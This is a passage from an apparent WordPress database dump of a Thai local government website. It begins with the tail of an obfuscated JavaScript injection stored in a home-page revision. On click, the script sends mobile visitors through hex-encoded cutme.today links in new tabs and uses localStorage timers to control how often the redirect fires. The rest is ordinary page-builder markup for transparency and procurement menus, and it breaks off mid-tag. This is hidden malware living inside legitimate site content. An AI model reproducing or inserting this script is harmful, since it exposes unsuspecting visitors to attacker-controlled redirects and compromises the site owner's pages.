_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-23 14:33:50','2024-08-23 07:33:50','',14,'http://pakhaeng.ssk.in.th/?p=1064',0,'revision','',0),
(1065,1,'2024-08-23 14:34:50','2024-08-23 07:34:50','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":3,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-3 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 